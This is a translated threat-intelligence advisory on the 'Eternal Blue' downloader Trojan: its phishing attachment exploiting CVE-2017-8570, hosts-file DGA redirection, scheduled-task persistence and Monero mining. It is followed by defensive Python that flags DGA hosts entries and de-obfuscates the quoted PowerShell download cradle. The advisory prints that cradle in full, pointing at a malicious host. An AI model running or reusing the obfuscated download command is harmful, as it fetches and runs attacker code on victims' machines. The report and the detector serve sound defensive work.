Source: Tencent Yujian Threat Intelligence Center

Editor's note: the original title is "The 'Eternal Blue Downloader Trojan' is being spread through new phishing emails, and the attachment contains CVE-2017-8570 exploit code".

After the "Eternal Blue" downloader Trojan runs on an infected user's machine, it automatically opens the current user's email address book and sends out a document attachment named "urgent.doc", which contains exploit code for CVE-2017-8570 (a high-risk Office vulnerability, also known as Sandworm II). If a recipient opens the document, the vulnerability may be triggered and the following PowerShell command executed to download mail.jsp:

C:/Windows/System32/cmd.exe /c powershell IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)

The download domain ap35nf7.jp is not actually registered, yet it can still be resolved to the address t.awcna.com. This is because the infected machine's local hosts file has been tampered with so that the randomly generated domain name maps to the malicious address used by the Trojan. For details, see the report previously released by the Yujian Threat Intelligence Center: "The 'Eternal Blue Downloader' Trojan tampers with hosts to point to random domain names, then uses multiple vulnerabilities to attack the intranet for mining." In this attack the Trojan uses randomly generated characters plus the suffix ".cn", ".jp" or ".kr" as the DGA domain name and points it, through the hosts file, at one of the following: t.tr2q.com, t.awcna.com, t.amynx.com.

mail.jsp is heavily obfuscated. After several rounds of decoding it can be seen to install multiple scheduled tasks that download PowerShell scripts for execution, under a new scheduled task name: "Bluetea".

The "Eternal Blue" downloader Trojan has never stopped updating since it first appeared.
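As an added defender-side example (not code from the Yujian report), the Python below applies two of the indicators described above to constructed input: it lists hosts-file entries whose name fits the random-label-plus-.cn/.jp/.kr pattern, and it strips the backtick splitting from the quoted command to recognise the WebClient download cradle. The DGA regex is a heuristic assumption, the sample hosts lines and the 203.0.113.10 address are constructed, and the command string is the one quoted in the report.

```python
import re
from typing import List, Tuple

# Heuristic (an assumption, not from the report): a short random label under .cn/.jp/.kr.
DGA_RE = re.compile(r"^[a-z0-9]{5,12}\.(cn|jp|kr)$")
# Download cradle shape after de-obfuscation: IEX (New-Object Net.WebClient).DownloadString
CRADLE_RE = re.compile(
    r"iex\s*\(\s*new-object\s+net\.webclient\s*\)\s*\.downloadstring", re.I)

def parse_hosts(text: str) -> List[Tuple[str, str]]:
    """Return (address, hostname) pairs from hosts-file text, skipping comments."""
    pairs = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop whole-line and inline comments
        parts = line.split()
        for name in parts[1:]:                # one address may carry several names
            pairs.append((parts[0], name.lower()))
    return pairs

def suspicious_hosts_entries(text: str) -> List[Tuple[str, str]]:
    """Hosts entries whose name looks like the Trojan's DGA pattern; a review list, not a verdict."""
    return [(addr, name) for addr, name in parse_hosts(text) if DGA_RE.match(name)]

def normalize_powershell(cmd: str) -> str:
    """Undo backtick splitting (IE`x -> IEx). Assumes no real escape sequences (`n, `t) are present."""
    return cmd.replace("`", "")

def is_download_cradle(cmd: str) -> bool:
    """True when the normalized command matches the WebClient download cradle."""
    return bool(CRADLE_RE.search(normalize_powershell(cmd)))

# Constructed sample hosts file; 203.0.113.10 is a documentation address, not an indicator.
SAMPLE_HOSTS = """127.0.0.1 localhost
# entries in the style the report describes: DGA names pinned by the Trojan
203.0.113.10 ap35nf7.jp
203.0.113.10 q9xv2kd.cn   # constructed
"""
# The command quoted in the report.
SAMPLE_CMD = ("C:/Windows/System32/cmd.exe /c powershell IE`x(Ne`w-Obj`ect Net.WebC`lient)"
              ".DownLoadString(http://ap35nf7.jp/mail.jsp?Administrator*OUHH1)")

if __name__ == "__main__":
    print(suspicious_hosts_entries(SAMPLE_HOSTS))  # [('203.0.113.10', 'ap35nf7.jp'), ('203.0.113.10', 'q9xv2kd.cn')]
    print(is_download_cradle(SAMPLE_CMD))          # True
```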
From the initial PE sample attack, it later moved to fileless PowerShell attacks to evade detection, and it persists by installing several kinds of scheduled tasks. In terms of propagation, after initially building up a batch of infected machines through a supply chain attack, it continued to spread using the "Eternal Blue" vulnerability, MSSQL brute-forcing, IPC$ brute-forcing, RDP brute-forcing and other methods. Recently, DGA domain name attacks and phishing email attacks have been added. Its ultimate goal is simply to use victims' machines to mine Monero for profit.

The update history of previous versions of the EternalBlue Downloader Trojan is summarized in the following table:

Safety Tips

1. Users are advised not to casually open email attachments from unknown sources and to be extremely cautious when running files from attachments; any scripts or other executable files should be scanned with antivirus software first.
2. Servers should use a secure password policy, especially for IPC$, MSSQL and RDP accounts; do not use weak passwords, so as to avoid weak-password brute-force attacks.
3. Following Microsoft's security advisory, promptly patch the Office vulnerability CVE-2017-8570, either with vulnerability scanning and repair tools or through Windows Update.